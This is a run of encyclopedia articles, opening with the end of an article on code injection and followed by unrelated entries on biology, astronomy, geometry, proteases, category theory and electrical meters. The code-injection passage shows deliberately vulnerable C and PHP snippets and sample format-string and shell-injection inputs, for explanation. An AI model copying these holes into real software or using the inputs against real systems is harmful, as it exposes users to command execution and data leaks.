asks the user for an integer and a string, then echoes out the user-provided string. char user_input[100]; int int_in; char password[10] = "Password1"; printf("Enter an integer\n"); scanf("%d", &int_in); printf("Please enter a string\n"); fgets(user_input, sizeof(user_input), stdin); printf(user_input); // Safe version is: printf("%s", user_input); printf("\n"); return 0;If the user input is filled with a list of format specifiers, such as %s%s%s%s%s%s%s%s, then printf()will start reading from the stack. Eventually, one of the %s format specifiers will access the address of password, which is on the stack, and print Password1 to the screen. Shell injection Shell injection (or command injection) is named after UNIX shells but applies to most systems that allow software to programmatically execute a command line. Here is an example vulnerable tcsh script: # !/bin/tcsh # check arg outputs it matches if arg is one if ($1 == 1) echo it matches If the above is stored in the executable file ./check, the shell command ./check " 1 ) evil" will attempt to execute the injected shell command evil instead of comparing the argument with the constant one. Here, the code under attack is the code that is trying to check the parameter, the very code that might have been trying to validate the parameter to defend against an attack. Any function that can be used to compose and run a shell command is a potential vehicle for launching a shell injection attack. Among these are system(), StartProcess(), and System.Diagnostics.Process.Start(). Client-server systems such as web browser interaction with web servers are potentially vulnerable to shell injection. Consider the following short PHP program that can run on a web server to run an external program called funnytext to replace a word the user sent with some other word. <?php passthru("/bin/funnytext " . $_GET['USER_INPUT']); The passthru function in the above program composes a shell command that is then executed by the web server. Since part of the command it composes is taken from the URL provided by the web browser, this allows the URL to inject malicious shell commands. One can inject code into this program in several ways by exploiting the syntax of various shell features (this list is not exhaustive): Some languages offer functions to properly escape or quote strings that are used to construct shell commands: PHP: escapeshellarg() and escapeshellcmd() Python: shlex.quote() However, this still puts the burden on programmers to know/learn about these functions and to remember to make use of them every time they use shell commands. In addition to using these functions, validating or sanitizing the user input is also recommended. A safer alternative is to use APIs that execute external programs directly rather than through a shell, thus preventing the possibility of shell injection. However, these APIs tend to not support various convenience features of shells and/or to be more cumbersome/verbose compared to concise shell syntax. See also References External links Tadeusz Pietraszek and Chris Vanden Berghe. "Defending against Injection Attacks through Context-Sensitive String Evaluation (CSSE)" News article "Flux spreads wider—First Trojan horse to make use of code injection to prevent detection from a firewall The Daily WTF regularly reports real-world instances of susceptibility to code injection in software Types of malware Injection exploits Machine code Articles with example C code
Code injection
Technology
3,504
13,629,364
https://en.wikipedia.org/wiki/Small%20nucleolar%20RNA%20SNORD99
In molecular biology, Small Nucleolar RNA SNORD99 (also known as HBII-420) is a non-coding RNA (ncRNA) molecule which functions in the biogenesis (modification) of other small nuclear RNAs (snRNAs). This type of modifying RNA is located in the nucleolus of the eukaryotic cell which is a major site of snRNA biogenesis. It is known as a small nucleolar RNA (snoRNA) and also often referred to as a guide RNA. SNORD99 belongs to the C/D box class of snoRNAs which contain the C (UGAUGA) and D (CUGA) box motifs. Most of the members of the box C/D family function in directing site-specific 2'-O-methylation of substrate RNAs. SNORD99 is predicted to guide the 2'O-ribose methylation of 28S ribosomal RNA at residue A2774. In the human genome this snoRNA shares the same host gene with the three H/ACA box snoRNAs ACA16, ACA44 and ACA61. References External links Non-coding RNA
Small nucleolar RNA SNORD99
Chemistry
254
42,620,834
https://en.wikipedia.org/wiki/FooDB
FooDB (The Food Database) is a freely available, open-access database containing chemical (micronutrient and macronutrient) composition data on common, unprocessed foods. It also contains extensive data on flavour and aroma constituents, food additives as well as positive and negative health effects associated with food constituents. The database contains information on more than 28,000 chemicals found in more than 1000 raw or unprocessed food products. The data in FooDB was collected from many sources including textbooks, scientific journals, on-line food composition or nutrient databases, flavour and aroma databases and various on-line metabolomic databases. This literature-derived information has been combined with experimentally derived data measured on thousands of compounds from more than 40 very common food products through the Alberta Food Metabolome Project which is led by David S. Wishart. Users are able to browse through the FooDB data by food source, name, descriptors or function. Chemical structures and molecular weights for compounds in FooDB may be searched via a specialized chemical structure search utility. Users are able to view the content of FooDB using two different “Viewing” options: FoodView, which lists foods by their chemical compounds, or ChemView, which lists chemicals by their food sources. Knowledge about the precise chemical composition of foods can be used to guide public health policies, assist food companies with improved food labelling, help dieticians prepare better dietary plans, support nutraceutical companies with their submissions of health claims and guide consumer choices with regard to food purchases. See also Human Metabolome Database DrugBank Food Food composition data Food composition databases References External links Foodb website Food databases
FooDB
Chemistry
344
16,110,878
https://en.wikipedia.org/wiki/List%20of%20bacteria%20genera
This article lists the genera of the bacteria. The currently accepted taxonomy is based on the List of Prokaryotic names with Standing in Nomenclature (LPSN) and National Center for Biotechnology Information (NCBI). However many taxonomic names are taken from the GTDB release 08-RS214 (28 April 2023). Phyla List Notes: List of clades needed to be added: Actinomycetota > Actinomycetia > Actinobacteridae Bacillota A > Clostridiia > "Lachnospirales" > Oscillospiraceae, Ruminococcaceae Bacteroidota > Bacteroidia Cyanobacteriota > Cyanobacteria Pseudomonadota (Proteobacteria s.s.) > "Caulobacteria", "Pseudomonadia" See also Branching order of bacterial phyla (Woese, 1987) Branching order of bacterial phyla (Gupta, 2001) Branching order of bacterial phyla (Cavalier-Smith, 2002) Branching order of bacterial phyla (Rappe and Giovanoni, 2003) Branching order of bacterial phyla (Battistuzzi et al., 2004) Branching order of bacterial phyla (Ciccarelli et al., 2006) Branching order of bacterial phyla after ARB Silva Living Tree Branching order of bacterial phyla (Genome Taxonomy Database, 2018) Bacterial phyla List of Archaea genera List of bacterial orders LPSN, list of accepted bacterial and archaeal names Human microbiome project MicroorganismPhyla References External links List of Bacteria genera Lists of bacteria
List of bacteria genera
Biology
343
33,731,592
https://en.wikipedia.org/wiki/Playfair%27s%20axiom
In geometry, Playfair's axiom is an axiom that can be used instead of the fifth postulate of Euclid (the parallel postulate): In a plane, given a line and a point not on it, at most one line parallel to the given line can be drawn through the point. It is equivalent to Euclid's parallel postulate in the context of Euclidean geometry and was named after the Scottish mathematician John Playfair. The "at most" clause is all that is needed since it can be proved from the first four axioms that at least one parallel line exists given a line L and a point P not on L, as follows: Construct a perpendicular: Using the axioms and previously established theorems, you can construct a line perpendicular to line L that passes through P. Construct another perpendicular: A second perpendicular line is drawn to the first one, starting from point P. Parallel Line: This second perpendicular line will be parallel to L by the definition of parallel lines (i.e the alternate interior angles are congruent as per the 4th axiom). The statement is often written with the phrase, "there is one and only one parallel". In Euclid's Elements, two lines are said to be parallel if they never meet and other characterizations of parallel lines are not used. This axiom is used not only in Euclidean geometry but also in the broader study of affine geometry where the concept of parallelism is central. In the affine geometry setting, the stronger form of Playfair's axiom (where "at most one" is replaced by "one and only one") is needed since the axioms of neutral geometry are not present to provide a proof of existence. Playfair's version of the axiom has become so popular that it is often referred to as Euclid's parallel axiom, even though it was not Euclid's version of the axiom. History Proclus (410–485 A.D.) clearly makes the statement in his commentary on Euclid I.31 (Book I, Proposition 31). In 1785 William Ludlam expressed the parallel axiom as follows: Two straight lines, meeting at a point, are not both parallel to a third line. This brief expression of Euclidean parallelism was adopted by Playfair in his textbook Elements of Geometry (1795) that was republished often. He wrote Two straight lines which intersect one another cannot be both parallel to the same straight line. Playfair acknowledged Ludlam and others for simplifying the Euclidean assertion. In later developments the point of intersection of the two lines came first, and the denial of two parallels became expressed as a unique parallel through the given point. In 1883 Arthur Cayley was president of the British Association and expressed this opinion in his address to the Association: My own view is that Euclid's Twelfth Axiom in Playfair's form of it, does not need demonstration, but is part of our notion of space, of the physical space of our experience, which is the representation lying at the bottom of all external experience. When David Hilbert wrote his book, Foundations of Geometry (1899), providing a new set of axioms for Euclidean geometry, he used Playfair's form of the axiom instead of the original Euclidean version for discussing parallel lines. Relation with Euclid's fifth postulate Euclid's parallel postulate states: If a line segment intersects two straight lines forming two interior angles on the same side that sum to less than two right angles, then the two lines, if extended indefinitely, meet on that side on which the angles sum to less than two right angles. The complexity of this statement when compared to Playfair's formulation is certainly a leading contribution to the popularity of quoting Playfair's axiom in discussions of the parallel postulate. Within the context of absolute geometry the two statements are equivalent, meaning that each can be proved by assuming the other in the presence of the remaining axioms of the geometry. This is not to say that the statements are logically equivalent (i.e., one can be proved from the other using only formal manipulations of logic), since, for example, when interpreted in the spherical model of elliptical geometry one statement is true and the other isn't. Logically equivalent statements have the same truth value in all models in which they have interpretations. The proofs below assume that all the axioms of absolute (neutral) geometry are valid. Euclid's fifth postulate implies Playfair's axiom The easiest way to show this is using the Euclidean theorem (equivalent to the fifth postulate) that states that the angles of a triangle sum to two right angles. Given a line and a point P not on that line, construct a line, t, perpendicular to the given one through the point P, and then a perpendicular to this perpendicular at the point P. This line is parallel because it cannot meet and form a triangle, which is stated in Book 1 Proposition 27 in Euclid's Elements. Now it can be seen that no other parallels exist. If n was a second line through P, then n makes an acute angle with t (since it is not the perpendicular) and the hypothesis of the fifth postulate holds, and so, n meets . Playfair's axiom implies Euclid's fifth postulate Given that Playfair's postulate implies that only the perpendicular to the perpendicular is a parallel, the lines of the Euclid construction will have to cut each other in a point. It is also necessary to prove that they will do it in the side where the angles sum to less than two right angles, but this is more difficult. Importance of triangle congruence The classical equivalence between Playfair's axiom and Euclid's fifth postulate collapses in the absence of triangle congruence. This is shown by constructing a geometry that redefines angles in a way that respects Hilbert's axioms of incidence, order, and congruence, except for the Side-Angle-Side (SAS) congruence. This geometry models the classical Playfair's axiom but not Euclid's fifth postulate. Transitivity of parallelism Proposition 30 of Euclid reads, "Two lines, each parallel to a third line, are parallel to each other." It was noted by Augustus De Morgan that this proposition is logically equivalent to Playfair’s axiom. This notice was recounted by T. L. Heath in 1908. De Morgan’s argument runs as follows: Let X be the set of pairs of distinct lines which meet and Y the set of distinct pairs of lines each of which is parallel to a single common line. If z represents a pair of distinct lines, then the statement, For all z, if z is in X then z is not in Y, is Playfair's axiom (in De Morgan's terms, No X is Y) and its logically equivalent contrapositive, For all z, if z is in Y then z is not in X, is Euclid I.30, the transitivity of parallelism (No Y is X). More recently the implication has been phrased differently in terms of the binary relation expressed by parallel lines: In affine geometry the relation is taken to be an equivalence relation, which means that a line is considered to be parallel to itself. Andy Liu wrote, "Let P be a point not on line 2. Suppose both line 1 and line 3 pass through P and are parallel to line 2. By transitivity, they are parallel to each other, and hence cannot have exactly P in common. It follows that they are the same line, which is Playfair's axiom." Notes References (3 vols.): (vol. 1), (vol. 2), (vol. 3). Foundations of geometry
Playfair's axiom
Mathematics
1,650
36,921,375
https://en.wikipedia.org/wiki/HD%20114837
HD 114837 is a suspected binary star system in the southern constellation of Centaurus. The brighter star is faintly visible to the naked eye with an apparent visual magnitude of 4.90. It has a magnitude 10.2 candidate common proper motion companion at an angular separation of , as of 2014. The distance to this system, based on an annual parallax shift of as seen from Earth's orbit, is 59.3 light years. It is moving closer with a heliocentric radial velocity of −64 km/s, and will approach to within in around 240,600 years. The primary component is an F-type main-sequence star with a stellar classification of , showing a mild underabundance of iron in its spectrum. It is about 3.4 billion years old with 1.14 times the mass of the Sun and about 1.3 times the Sun's radius. This star is radiating 3.12 times the Sun's luminosity from its photosphere at an effective temperature of 6,346 K. References F-type main-sequence stars Centauri, 191 Centaurus Durchmusterung objects 0503 114837 064583 4989
HD 114837
Astronomy
248
23,992
https://en.wikipedia.org/wiki/Piscis%20Austrinus
Piscis Austrinus is a constellation in the southern celestial hemisphere. The name is Latin for "the southern fish", in contrast with the larger constellation Pisces, which represents a pair of fish. Before the 20th century, it was also known as Piscis Notius. Piscis Austrinus was one of the 48 constellations listed by the 2nd-century astronomer Ptolemy, and it remains one of the 88 modern constellations. The stars of the modern constellation Grus once formed the "tail" of Piscis Austrinus. In 1597 (or 1598), Petrus Plancius carved out a separate constellation and named it after the crane. It is a faint constellation, containing only one star brighter than 4th magnitude: Fomalhaut, which is 1st magnitude and the 18th-brightest star in the night sky. Fomalhaut is surrounded by a circumstellar disk, and possibly hosts a planet. Other objects contained within the boundaries of the constellation include Lacaille 9352, one of the brightest red dwarf stars in the night sky (though still too faint to see with the naked eye); and PKS 2155-304, a BL Lacertae object that is one of the optically brightest blazars in the sky. Origins Pisces Austrinus originated with the Babylonian constellation simply known as the Fish (MUL.KU). Professor of astronomy Bradley Schaefer has proposed that ancient observers must have been able to see as far south as Mu Piscis Austrini to define a pattern that looked like a fish. Like many of Schaefer's proposals this is nothing new: mu PsA is explicitly mentioned in the Almagest and the constellation is definitely a takeover from ancient Babylon. Along with the eagle Aquila the crow Corvus and water snake Hydra, Piscis Austrinus was introduced to the Ancient Greeks around 500 BCE; the constellations marked the summer and winter solstices, respectively. In Greek mythology, this constellation is known as the Great Fish and it is portrayed as swallowing the water being poured out by Aquarius, the water-bearer constellation. The two fish of the constellation Pisces are said to be the offspring of the Great Fish. In Egyptian mythology, this fish saved the life of the Egyptian goddess Isis, so she placed this fish and its descendants into the heavens as constellations of stars. In the 5th century BC, Greek historian Ctesias wrote that the fish was said to have lived in a lake near Bambyce in Syria and had saved Derceto, daughter of Aphrodite, and for this deed was placed in the heavens. For this reason, fish were sacred and not eaten by many Syrians. Characteristics Piscis Austrinus is a constellation bordered by Capricornus to the northwest, Microscopium to the southwest, Grus to the south, Sculptor to the east, and Aquarius to the north. Its recommended three-letter abbreviation, as adopted by the International Astronomical Union in 1922, is "PsA". Ptolemy called the constellation Ichthus Notios "Southern Fish" in his Almagest; this was Latinised to Piscis Notius and used by German celestial cartographers Johann Bayer and Johann Elert Bode. Bayer also called it Piscis Meridanus and Piscis Austrinus, while French astronomer Nicolas-Louis de Lacaille called it Piscis Australis. English Astronomer Royal John Flamsteed went with Piscis Austrinus, which was followed by most subsequently. The official constellation boundaries, as set by Belgian astronomer Eugène Delporte in 1930, are defined by a polygon of four segments (illustrated in infobox). In the equatorial coordinate system, the right ascension coordinates of these borders lie between and , while the declination coordinates are between −24.83° and −36.46°. The whole constellation is visible to observers south of latitude 53°N. Features Stars Ancient astronomers counted twelve stars as belonging to Piscis Austrinus, though one was later incorporated into nearby Grus as Gamma Gruis. Other stars became part of Microscopium. Bayer used the Greek letters alpha through mu to label the most prominent stars in the constellation. Ptolemy had catalogued Fomalhaut (Alpha Piscis Austrini) as belonging to both this constellation and Aquarius. Lacaille redrew the constellation as it was poorly visible from Europe, adding pi, and relabelling gamma, delta and epsilon as epsilon, eta and gamma, respectively. However, Baily and Gould did not uphold these changes as Bayer's original chart was fairly accurate. Bode added tau and upsilon. Flamsteed gave 24 stars Flamsteed designations, though the first four numbered became part of Microscopium. Within the constellation's borders, there are 47 stars brighter than or equal to apparent magnitude 6.5. Traditionally representing the mouth of the fish, Fomalhaut is the brightest star in the constellation and the 19th-brightest star in the night sky, with an apparent magnitude of 1.16. Located 25.13 ± 0.09 light-years away, it is a white main-sequence star that is 1.92 ± 0.02 times as massive and 16.63 ± 0.48 as luminous as the Sun. Its companion Fomalhaut b was thought to be the first extrasolar planet ever detected by a visible light image, thanks to the Hubble Space Telescope, but infrared observations have since retracted this claim: it is instead a spherical cloud of dust. TW Piscis Austrini can be seen close by and is possibly associated with Fomalhaut as it lies within a light-year of it. Of magnitude 6.5, it is a BY Draconis variable. The second-brightest star in the constellation, Epsilon Piscis Austrini is a blue-white star of magnitude +4.17. Located 400 ± 20 light-years distant, it is a blue-white main-sequence star 4.10 ± 0.19 times as massive as the Sun, and around 661 times as luminous. Beta, Delta and Zeta constitute the Tien Kang ("heavenly rope") in China. Beta is a white main-sequence star of apparent magnitude 4.29 that is of similar size and luminosity to Fomalhaut but five times as remote, at around 143 ± 1 light-years distant from Earth. Delta Piscis Austrini is a double star with components of magnitude 4.2 and 9.2. The brighter is a yellow giant of spectral type G8 III. It is a red clump star that is burning helium in its core. It is 172 ± 2 light-years distant from Earth. Zeta Piscis Austrini is an orange giant star of spectral type K1III that is located 413 ± 2 light-years distant from Earth. It is a suspected variable star. S Piscis Austrini is a long-period Mira-type variable red giant which ranges between magnitude 8.0 and 14.5 over a period of 271.7 days, and V Piscis Austrini is a semi-regular variable ranging between magnitudes 8.0 and 9.0 over 148 days. Lacaille 9352 is a faint red dwarf star of spectral type M0.5V that is just under half the Sun's diameter and mass. A mere 10.74 light-years away, it is too dim to be seen with the naked eye at magnitude 7.34. In June 2020 two super-Earth planets were discovered via radial velocity method. Exoplanets have been discovered in five other star systems in the constellation. HD 205739 is a yellow-white main-sequence star of spectral type F7 V that has a planet around 1.37 times as massive as Jupiter orbiting it with a period of 279 days, and a suggestion of a second planet. HD 216770 is an orange dwarf accompanied by a Jupiter-like planet every 118 days. HD 207832 is a star of spectral type G5V with a diameter and mass about 90% of that of the Sun, and around 77% of its luminosity. Two gas giant planets with masses around 56% and 73% that of Jupiter were discovered in 2012 via the radial velocity method. With orbits of 162 and 1156 days, they average around 0.57 and 2.11 astronomical units away from their star. WASP-112 and WASP-124 are two sun-like stars that have planets discovered by transit. Deep sky objects NGC 7172, NGC 7174 and NGC 7314 are three galaxies of magnitudes 11.9, 12.5 and 10.9, respectively. NGC 7259 is another spiral galaxy, which hosted a supernova—SN 2009ip—in 2009. At redshift z = 0.116, the BL Lacertae object PKS 2155-304 is one of the brightest blazars in the sky. See also Piscis Austrinus in Chinese astronomy Notes References External links Warburg Institute Iconographic Database (medieval and early modern images of Piscis Austrinus under the name Piscis magnus) The clickable Piscis Austrinus Constellations Southern constellations Constellations listed by Ptolemy
Piscis Austrinus
Astronomy
1,942
40,763,842
https://en.wikipedia.org/wiki/PA%20clan%20of%20proteases
The PA clan (Proteases of mixed nucleophile, superfamily A) is the largest group of proteases with common ancestry as identified by structural homology. Members have a chymotrypsin-like fold and similar proteolysis mechanisms but can have identity of <10%. The clan contains both cysteine and serine proteases (different nucleophiles). PA clan proteases can be found in plants, animals, fungi, eubacteria, archaea and viruses. The common use of the catalytic triad for hydrolysis by multiple clans of proteases, including the PA clan, represents an example of convergent evolution. The differences in the catalytic triad within the PA clan is also an example of divergent evolution of active sites in enzymes. History In the 1960s, the sequence similarity of several proteases indicated that they were evolutionarily related. These were grouped into the chymotrypsin-like serine proteases (now called the S1 family). As the structures of these, and other proteases were solved by X-ray crystallography in the 1970s and 80s, it was noticed that several viral proteases such as Tobacco Etch Virus protease showed structural homology despite no discernible sequence similarity and even a different nucleophile. Based on structural homology, a superfamily was defined and later named the PA clan (by the MEROPS classification system). As more structures are solved, more protease families have been added to the PA clan superfamily. Etymology The P refers to Proteases of mixed nucleophile. The A indicates that it was the first such clan to be identified (there also exist the PB, PC, PD and PE clans). Structure Despite retaining as little as 10% sequence identity, PA clan members isolated from viruses, prokaryotes and eukaryotes show structural homology and can be aligned by structural similarity (e.g. with DALI). Double β-barrel PA clan proteases all share a core motif of two β-barrels with covalent catalysis performed by an acid-histidine-nucleophile catalytic triad motif. The barrels are arranged perpendicularly beside each other with hydrophobic residues holding them together as the core scaffold for the enzyme. The triad residues are split between the two barrels so that catalysis takes place at their interface. Viral protease loop In addition to the double β-barrel core, some viral proteases (such as TEV protease) have a long, flexible C-terminal loop that forms a lid that completely covers the substrate and create a binding tunnel. This tunnel contains a set of tight binding pockets such that each side chain of the substrate peptide (P6 to P1’) is bound in a complementary site (S6 to S1’) and specificity is endowed by the large contact area between enzyme and substrate. Conversely, cellular proteases that lack this loop, such as trypsin have broader specificity. Evolution and function Catalytic activity Structural homology indicates that the PA clan members are descended from a common ancestor of the same fold. Although PA clan proteases use a catalytic triad perform 2-step nucleophilic catalysis, some families use serine as the nucleophile whereas others use cysteine. The superfamily is therefore an extreme example of divergent enzyme evolution since during evolutionary history, the core catalytic residue of the enzyme has switched in different families. In addition to their structural similarity, directed evolution has been shown to be able to convert a cysteine protease into an active serine protease. All cellular PA clan proteases are serine proteases, however there are both serine and cysteine protease families of viral proteases. The majority are endopeptidases, with the exception being the S46 family of exopeptidases. Biological role and substrate specificity In addition to divergence in their core catalytic machinery, the PA clan proteases also show wide divergent evolution in function. Members of the PA clan can be found in eukaryotes, prokaryotes and viruses and encompass a wide range of functions. In mammals, some are involved in blood clotting (e.g. thrombin) and so have high substrate specificity as well as digestion (e.g. trypsin) with broad substrate specificity. Several snake venoms are also PA clan proteases, such as pit viper haemotoxin and interfere with the victim's blood clotting cascade. Additionally, bacteria such as Staphylococcus aureus secrete exfoliative toxin which digest and damage the host's tissues. Many viruses express their genome as a single, massive polyprotein and use a PA clan protease to cleave this into functional units (e.g. polio, norovirus, and TEV proteases). There are also several pseudoenzymes in the superfamily, where the catalytic triad residues have been mutated and so function as binding proteins. For example, the heparin-binding protein Azurocidin has a glycine in place of the nucleophile and a serine in place of the histidine. Families Within the PA clan (P=proteases of mixed nucleophiles), families are designated by their catalytic nucleophile (C=cysteine proteases, S=serine proteases). Despite the lack of sequence homology for the PA clan as a whole, individual families within it can be identified by sequence similarity. See also Protease cysteine- serine- threonine- aspartic- metallo- Catalytic triad Homology (biology) MEROPS Protein family Protein superfamily Protein structure Structural alignment References External links MEROPS - Comprehensive protease database Superfamily - A database of protein folds EC 3.4 Molecular evolution Proteases Protein superfamilies
PA clan of proteases
Chemistry,Biology
1,259
48,897,477
https://en.wikipedia.org/wiki/Quotient%20of%20an%20abelian%20category
In mathematics, the quotient (also called Serre quotient or Gabriel quotient) of an abelian category by a Serre subcategory is the abelian category which, intuitively, is obtained from by ignoring (i.e. treating as zero) all objects from . There is a canonical exact functor whose kernel is , and is in a certain sense the most general abelian category with this property. Forming Serre quotients of abelian categories is thus formally akin to forming quotients of groups. Serre quotients are somewhat similar to quotient categories, the difference being that with Serre quotients all involved categories are abelian and all functors are exact. Serre quotients also often have the character of localizations of categories, especially if the Serre subcategory is localizing. Definition Formally, is the category whose objects are those of and whose morphisms from X to Y are given by the direct limit (of abelian groups) where the limit is taken over subobjects and such that and . (Here, and denote quotient objects computed in .) These pairs of subobjects are ordered by . Composition of morphisms in is induced by the universal property of the direct limit. The canonical functor sends an object X to itself and a morphism to the corresponding element of the direct limit with X′ = X and Y′ = 0. An alternative, equivalent construction of the quotient category uses what is called a "calculus of fractions" to define the morphisms of . Here, one starts with the class of those morphisms in whose kernel and cokernel both belong to . This is a multiplicative system in the sense of Gabriel-Zisman, and one can localize the category at the system to obtain . Examples Let be a field and consider the abelian category of all vector spaces over . Then the full subcategory of finite-dimensional vector spaces is a Serre-subcategory of . The Serre quotient has as objects the -vector spaces, and the set of morphisms from to in is (which is a quotient of vector spaces). This has the effect of identifying all finite-dimensional vector spaces with 0, and of identifying two linear maps whenever their difference has finite-dimensional image. This example shows that the Serre quotient can behave like a quotient category. For another example, take the abelian category Ab of all abelian groups and the Serre subcategory of all torsion abelian groups. The Serre quotient here is equivalent to the category of all vector spaces over the rationals, with the canonical functor given by tensoring with . Similarly, the Serre quotient of the category of finitely generated abelian groups by the subcategory of finitely generated torsion groups is equivalent to the category of finite-dimensional vectorspaces over . Here, the Serre quotient behaves like a localization. Properties The Serre quotient is an abelian category, and the canonical functor is exact and surjective on objects. The kernel of is , i.e., is zero in if and only if belongs to . The Serre quotient and canonical functor are characterized by the following universal property: if is any abelian category and is an exact functor such that is a zero in for each object , then there is a unique exact functor such that . Given three abelian categories , , , we have if and only if there exists an exact and essentially surjective functor whose kernel is and such that for every morphism in there exist morphisms and in so that is an isomorphism and . Theorems involving Serre quotients Serre's description of coherent sheaves on a projective scheme According to a theorem by Jean-Pierre Serre, the category of coherent sheaves on a projective scheme (where is a commutative noetherian graded ring, graded by the non-negative integers and generated by degree-0 and finitely many degree-1 elements, and refers to the Proj construction) can be described as the Serre quotient where denotes the category of finitely-generated graded modules over and is the Serre subcategory consisting of all those graded modules which are 0 in all degrees that are high enough, i.e. for which there exists such that for all . A similar description exists for the category of quasi-coherent sheaves on , even if is not noetherian. Gabriel–Popescu theorem The Gabriel–Popescu theorem states that any Grothendieck category is equivalent to a Serre quotient of the form , where denotes the abelian category of right modules over some unital ring , and is some localizing subcategory of . Quillen's localization theorem Daniel Quillen's algebraic K-theory assigns to each exact category a sequence of abelian groups , and this assignment is functorial in . Quillen proved that, if is a Serre subcategory of the abelian category , there is a long exact sequence of the form References Category theory
Quotient of an abelian category
Mathematics
1,080
41,610,115
https://en.wikipedia.org/wiki/Ayrton%20shunt
The Ayrton shunt or universal shunt is a high-resistance shunt used in galvanometers to increase their range without changing the damping. The circuit is named after its inventor William E. Ayrton. Multirange ammeters that use this technique are more accurate than those using a make-before-break switch. Also it will eliminate the possibility of having a meter without a shunt which is a serious concern in make-before-break switches. The selector switch changes the amount of resistance in parallel with Rm (meter resistance). The voltage drop across parallel branches is always equal. When all resistances are placed in parallel with Rm maximum sensitivity of ammeter is reached. Ayrton shunt is rarely used for currents above 10 amperes. m1 = I1/Im , m2 = I2/Im, m3 = I3/Im References Sources Electrical circuits Electrical meters
Ayrton shunt
Technology,Engineering
186